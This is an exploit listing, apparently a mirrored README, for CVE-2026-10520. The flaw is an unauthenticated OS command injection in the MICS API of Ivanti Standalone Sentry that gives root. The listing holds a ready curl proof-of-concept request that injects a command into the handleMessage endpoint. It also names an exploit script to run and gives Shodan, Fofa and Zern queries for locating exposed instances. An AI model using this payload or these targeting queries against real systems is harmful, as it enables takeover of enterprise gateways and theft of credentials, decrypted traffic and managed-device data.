Exploit for OS Command Injection in Ivanti Standalone_Sentry CVE-2026-10520

Name: Exploit for OS Command Injection in Ivanti Standalone_Sentry CVE-2026-10520
Rating: 5 (15 reviews)
2026-06-18 | CVSS 10.0
## https://sploitus.com/exploit?id=64AD591D-B6CF-5E92-941D-257E7A137B09
# CVE-2026-10520

[![Python](https://img.shields.io/badge/Python-3.12%2B-blue.svg)][01]
[![CVSS](https://img.shields.io/badge/CVSS-10%20CRITICAL-darkred.svg)][01]
[![License](https://img.shields.io/badge/License-SCTPL-green.svg)](./LICENSE)
[![Educational](https://img.shields.io/badge/Purpose-Educational%20Only-yellow.svg)](./LICENSE)

[Ivanti Sentry][07] (formerly MobileIron Sentry) is an enterprise security
gateway that proxies traffic between mobile devices and corporate backend
resources: email, SharePoint, and internal web applications. It enforces
*Mobile Device Management* (MDM) policies, terminates encrypted mobile
sessions, and issues certificate-based authentication for enterprise app
deployments. Sentry instances are typically internet-facing on port**8443**,
exposing the MICS (Mobile Iron Configuration Service) administration API.

**CVE-2026-10520** is an **unauthenticated OS command injection** vulnerability
affecting Ivanti Sentry **before R10.5.2, R10.6.2, and R10.7.1**
(CVSSv3.1: **10 Critical**, listed in CISA KEV). The flaw is in the **MICS API**
endpoint `/mics/api/v2/sentry/mics-config/handleMessage`, which accepts
**XML-wrapped** system commands via a URL-encoded `message` **POST** body
without any authentication or input validation. An attacker who reaches a
vulnerable endpoint can execute arbitrary OS commands as **root**, obtaining
full control of the host — including decrypted enterprise traffic, stored
credentials, and all managed mobile-device data.

## PoC

```bash
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec 1id"
```

## Usage

```txt
python CVE-2026-10520-X7.py
```

* [Zern][04]    : `title:"Ivanti System Manager: Sign In"`
* [Fofa][05]    : `body="sentry" && body="System Manager" && port="8443"`, `title="Ivanti System Manager: Sign In"`, `icon_hash=="1407597555"`
* [Shodan][06]  : `http.html:"Ivanti Standalone Sentry System Manager" port:8443` , `http.title:Ivanti port:8443`, `http.html:"Ivanti" http.html:"Sentry" port:8443`

## Resources

* [OpenCVE — Root-Level RCE via OS Command Injection in Ivanti Sentry][01]
* [NIST — CVE-2026-10520 Detail][02]
* [Ivanti Sentry — Official Product Page][07]

## Authors

* ErrorInside // SCT

## License

SCT-PL

[01]: https://app.opencve.io/cve/CVE-2026-10520
[02]: https://nvd.nist.gov/vuln/detail/CVE-2026-10520
[04]: https://zern.io
[05]: https://en.fofa.info
[06]: https://www.shodan.io
[07]: https://www.ivanti.com/products/secure-connectivity/sentry